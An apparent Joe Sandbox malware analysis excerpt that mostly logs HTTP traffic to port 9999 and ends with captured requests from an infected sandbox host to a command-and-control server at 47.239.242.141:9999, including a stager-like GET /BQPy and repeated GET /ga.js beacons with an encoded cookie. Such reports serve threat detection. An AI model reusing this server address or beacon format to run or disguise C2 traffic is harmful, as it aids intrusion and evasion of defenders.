Source: unknown	Network traffic detected: HTTP traffic on port 57262 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57262
Source: unknown	Network traffic detected: HTTP traffic on port 57263 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57263
Source: unknown	Network traffic detected: HTTP traffic on port 57264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57264
Source: unknown	Network traffic detected: HTTP traffic on port 57265 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57265
Source: unknown	Network traffic detected: HTTP traffic on port 54000 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54000
Source: unknown	Network traffic detected: HTTP traffic on port 54001 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54001
Source: unknown	Network traffic detected: HTTP traffic on port 54002 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54002
Source: unknown	Network traffic detected: HTTP traffic on port 54003 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54003
Source: unknown	Network traffic detected: HTTP traffic on port 54004 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54004
Source: unknown	Network traffic detected: HTTP traffic on port 54005 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54005
Source: unknown	Network traffic detected: HTTP traffic on port 54006 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54006
Source: unknown	Network traffic detected: HTTP traffic on port 54007 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54007
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54008
Source: unknown	Network traffic detected: HTTP traffic on port 54009 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54009
Source: unknown	Network traffic detected: HTTP traffic on port 54011 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54011
Source: unknown	Network traffic detected: HTTP traffic on port 54012 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54012
Source: unknown	Network traffic detected: HTTP traffic on port 54022 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54022
Source: unknown	Network traffic detected: HTTP traffic on port 54029 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54029
Source: unknown	Network traffic detected: HTTP traffic on port 54035 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54035
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54046
Source: unknown	Network traffic detected: HTTP traffic on port 54052 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54052
Source: unknown	Network traffic detected: HTTP traffic on port 54058 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54058
Source: unknown	Network traffic detected: HTTP traffic on port 54067 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54067
Source: unknown	Network traffic detected: HTTP traffic on port 54075 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54075
Source: unknown	Network traffic detected: HTTP traffic on port 54076 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54076
Source: unknown	Network traffic detected: HTTP traffic on port 54087 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54087
Source: unknown	Network traffic detected: HTTP traffic on port 54093 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54093
Source: unknown	Network traffic detected: HTTP traffic on port 54099 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54099
Source: unknown	Network traffic detected: HTTP traffic on port 54110 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54110
Source: unknown	Network traffic detected: HTTP traffic on port 54116 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54116
Source: unknown	Network traffic detected: HTTP traffic on port 54123 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54123
Source: unknown	Network traffic detected: HTTP traffic on port 54132 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54132
Source: unknown	Network traffic detected: HTTP traffic on port 54137 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54137
Source: unknown	Network traffic detected: HTTP traffic on port 54141 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54141
Source: unknown	Network traffic detected: HTTP traffic on port 54147 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54147
Source: unknown	Network traffic detected: HTTP traffic on port 54151 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54151
Source: unknown	Network traffic detected: HTTP traffic on port 54157 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54157
Source: unknown	Network traffic detected: HTTP traffic on port 54167 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54167
Source: unknown	Network traffic detected: HTTP traffic on port 54174 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54174
Source: unknown	Network traffic detected: HTTP traffic on port 54180 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54180
Source: unknown	Network traffic detected: HTTP traffic on port 54190 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54190
Source: unknown	Network traffic detected: HTTP traffic on port 54197 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54197
Source: unknown	Network traffic detected: HTTP traffic on port 54203 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54203
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54209
Source: unknown	Network traffic detected: HTTP traffic on port 54220 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54220
Source: unknown	Network traffic detected: HTTP traffic on port 54226 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54226
Source: unknown	Network traffic detected: HTTP traffic on port 54235 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 54241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54241
Source: unknown	Network traffic detected: HTTP traffic on port 54249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54249
Source: unknown	Network traffic detected: HTTP traffic on port 54255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54255
Source: unknown	Network traffic detected: HTTP traffic on port 54264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54264
Source: unknown	Network traffic detected: HTTP traffic on port 54271 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54271
Source: unknown	Network traffic detected: HTTP traffic on port 54278 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54278
Source: unknown	Network traffic detected: HTTP traffic on port 54287 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54287
Source: unknown	Network traffic detected: HTTP traffic on port 54295 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54295
Source: unknown	Network traffic detected: HTTP traffic on port 54301 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54301
Source: unknown	Network traffic detected: HTTP traffic on port 54310 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54310
Source: unknown	Network traffic detected: HTTP traffic on port 54318 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54318
Source: unknown	Network traffic detected: HTTP traffic on port 54319 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54319
Source: unknown	Network traffic detected: HTTP traffic on port 54320 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54320
Source: unknown	Network traffic detected: HTTP traffic on port 54321 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54321
Source: unknown	Network traffic detected: HTTP traffic on port 54322 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54322
Source: unknown	Network traffic detected: HTTP traffic on port 54323 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54323
Source: unknown	Network traffic detected: HTTP traffic on port 54324 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54324
Source: unknown	Network traffic detected: HTTP traffic on port 54325 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54325
Source: unknown	Network traffic detected: HTTP traffic on port 54326 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54326
Source: unknown	Network traffic detected: HTTP traffic on port 54327 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54327
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54328
Source: unknown	Network traffic detected: HTTP traffic on port 54329 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54329
Source: unknown	Network traffic detected: HTTP traffic on port 54330 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54330
Source: unknown	Network traffic detected: HTTP traffic on port 54331 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54331
Source: unknown	Network traffic detected: HTTP traffic on port 54332 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54332
Source: unknown	Network traffic detected: HTTP traffic on port 54333 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54333
Source: unknown	Network traffic detected: HTTP traffic on port 54334 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54334
Source: unknown	Network traffic detected: HTTP traffic on port 54335 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54335
Source: unknown	Network traffic detected: HTTP traffic on port 54336 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54336
Source: unknown	Network traffic detected: HTTP traffic on port 54337 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54337
Source: unknown	Network traffic detected: HTTP traffic on port 54338 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54338
Source: unknown	Network traffic detected: HTTP traffic on port 54339 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54339
Source: unknown	Network traffic detected: HTTP traffic on port 54340 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54340
Source: unknown	Network traffic detected: HTTP traffic on port 54341 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54341
Source: unknown	Network traffic detected: HTTP traffic on port 54342 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54342
Source: unknown	Network traffic detected: HTTP traffic on port 54343 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54343
Source: unknown	Network traffic detected: HTTP traffic on port 54344 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54344
Source: unknown	Network traffic detected: HTTP traffic on port 54345 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54345
Source: unknown	Network traffic detected: HTTP traffic on port 54346 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54346
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54347
Source: unknown	Network traffic detected: HTTP traffic on port 54348 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54348
Source: unknown	Network traffic detected: HTTP traffic on port 54349 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54349
Source: unknown	Network traffic detected: HTTP traffic on port 54350 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54350
Source: unknown	Network traffic detected: HTTP traffic on port 54351 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54351
Source: unknown	Network traffic detected: HTTP traffic on port 54352 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54352
Source: unknown	Network traffic detected: HTTP traffic on port 54353 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54353
Source: unknown	Network traffic detected: HTTP traffic on port 54354 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54354
Source: unknown	Network traffic detected: HTTP traffic on port 54355 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54355
Source: unknown	Network traffic detected: HTTP traffic on port 54356 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54356
Source: unknown	Network traffic detected: HTTP traffic on port 54357 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54357
Source: unknown	Network traffic detected: HTTP traffic on port 54358 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 54359 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54359
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54360
Source: unknown	Network traffic detected: HTTP traffic on port 54361 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54361
Source: unknown	Network traffic detected: HTTP traffic on port 54362 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54362
Source: unknown	Network traffic detected: HTTP traffic on port 54363 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54363
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54364
Source: unknown	Network traffic detected: HTTP traffic on port 54365 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54365
Source: unknown	Network traffic detected: HTTP traffic on port 54366 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54366
Source: unknown	Network traffic detected: HTTP traffic on port 54367 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54367
Source: unknown	Network traffic detected: HTTP traffic on port 54368 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54368
Source: unknown	Network traffic detected: HTTP traffic on port 54369 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54369
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54370
Source: unknown	Network traffic detected: HTTP traffic on port 54371 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54371
Source: unknown	Network traffic detected: HTTP traffic on port 54372 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54372
Source: unknown	Network traffic detected: HTTP traffic on port 54373 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54373
Source: unknown	Network traffic detected: HTTP traffic on port 54374 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54374
Source: unknown	Network traffic detected: HTTP traffic on port 54375 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54375
Source: unknown	Network traffic detected: HTTP traffic on port 54376 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54376
Source: unknown	Network traffic detected: HTTP traffic on port 54377 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54377
Source: unknown	Network traffic detected: HTTP traffic on port 54378 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54378
Source: unknown	Network traffic detected: HTTP traffic on port 54379 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54379
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54380
Source: unknown	Network traffic detected: HTTP traffic on port 54381 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54381
Source: unknown	Network traffic detected: HTTP traffic on port 54382 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54382
Source: unknown	Network traffic detected: HTTP traffic on port 54383 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54383
Source: unknown	Network traffic detected: HTTP traffic on port 54384 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54384
Source: unknown	Network traffic detected: HTTP traffic on port 54385 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54385
Source: unknown	Network traffic detected: HTTP traffic on port 54386 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54386
Source: unknown	Network traffic detected: HTTP traffic on port 54387 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54387
Source: unknown	Network traffic detected: HTTP traffic on port 54388 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54388
Source: unknown	Network traffic detected: HTTP traffic on port 54389 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54389
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54390
Source: unknown	Network traffic detected: HTTP traffic on port 54391 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54391
Source: unknown	Network traffic detected: HTTP traffic on port 54392 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54392
Source: unknown	Network traffic detected: HTTP traffic on port 54393 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54393
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 54395 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54395
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 54397 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54397
Source: unknown	Network traffic detected: HTTP traffic on port 54398 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54398
Source: unknown	Network traffic detected: HTTP traffic on port 54399 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54399
Source: unknown	Network traffic detected: HTTP traffic on port 54400 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54400
Source: unknown	Network traffic detected: HTTP traffic on port 54401 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54401
Source: unknown	Network traffic detected: HTTP traffic on port 54402 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54402
Source: unknown	Network traffic detected: HTTP traffic on port 54403 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54403
Source: unknown	Network traffic detected: HTTP traffic on port 54404 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54404
Source: unknown	Network traffic detected: HTTP traffic on port 54405 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54405
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 54407 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54407
Source: unknown	Network traffic detected: HTTP traffic on port 54408 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54408
Source: unknown	Network traffic detected: HTTP traffic on port 54409 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54409
Source: unknown	Network traffic detected: HTTP traffic on port 54410 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54410
Source: unknown	Network traffic detected: HTTP traffic on port 54411 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54411
Source: unknown	Network traffic detected: HTTP traffic on port 54412 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54412
Source: unknown	Network traffic detected: HTTP traffic on port 54413 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54413
Source: unknown	Network traffic detected: HTTP traffic on port 54414 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54414
Source: unknown	Network traffic detected: HTTP traffic on port 54415 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54415
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54416
Source: unknown	Network traffic detected: HTTP traffic on port 54417 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54417
Source: unknown	Network traffic detected: HTTP traffic on port 54418 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54418
Source: unknown	Network traffic detected: HTTP traffic on port 54419 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54419
Source: unknown	Network traffic detected: HTTP traffic on port 54420 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54420
Source: unknown	Network traffic detected: HTTP traffic on port 54421 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54421
Source: unknown	Network traffic detected: HTTP traffic on port 54422 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54422
Source: unknown	Network traffic detected: HTTP traffic on port 54423 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54423
Source: unknown	Network traffic detected: HTTP traffic on port 54424 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54424
Source: unknown	Network traffic detected: HTTP traffic on port 54425 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54425
Source: unknown	Network traffic detected: HTTP traffic on port 54426 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54426
Source: unknown	Network traffic detected: HTTP traffic on port 54427 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54427
Source: unknown	Network traffic detected: HTTP traffic on port 54428 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54428
Source: unknown	Network traffic detected: HTTP traffic on port 54429 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54429
Source: unknown	Network traffic detected: HTTP traffic on port 54430 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54430
Source: unknown	Network traffic detected: HTTP traffic on port 54431 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54431
Source: unknown	Network traffic detected: HTTP traffic on port 54432 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54432
Source: unknown	Network traffic detected: HTTP traffic on port 54433 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54433
Source: unknown	Network traffic detected: HTTP traffic on port 54434 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54434
Source: unknown	Network traffic detected: HTTP traffic on port 54435 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54435
Source: unknown	Network traffic detected: HTTP traffic on port 54436 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54436
Source: unknown	Network traffic detected: HTTP traffic on port 54437 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54437
Source: unknown	Network traffic detected: HTTP traffic on port 54438 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54438
Source: unknown	Network traffic detected: HTTP traffic on port 54439 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54439
Source: unknown	Network traffic detected: HTTP traffic on port 54440 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 54441 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54441
Source: unknown	Network traffic detected: HTTP traffic on port 54442 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54442
Source: unknown	Network traffic detected: HTTP traffic on port 54443 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54443
Source: unknown	Network traffic detected: HTTP traffic on port 54444 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54444
Source: unknown	Network traffic detected: HTTP traffic on port 54445 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54445
Source: unknown	Network traffic detected: HTTP traffic on port 54446 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 54447 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54447
Source: unknown	Network traffic detected: HTTP traffic on port 54448 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54448
Source: unknown	Network traffic detected: HTTP traffic on port 54449 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54449
Source: unknown	Network traffic detected: HTTP traffic on port 54450 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54450
Source: unknown	Network traffic detected: HTTP traffic on port 54451 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54451
Source: unknown	Network traffic detected: HTTP traffic on port 54452 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54452
Source: unknown	Network traffic detected: HTTP traffic on port 54453 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54453
Source: unknown	Network traffic detected: HTTP traffic on port 54454 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54454
Source: unknown	Network traffic detected: HTTP traffic on port 54455 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54455

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 47.239.242.141:9999

Source: Joe Sandbox View

ASN Name: CHARTER-20115US CHARTER-20115US

Source: global traffic	HTTP traffic detected: GET /BQPy HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
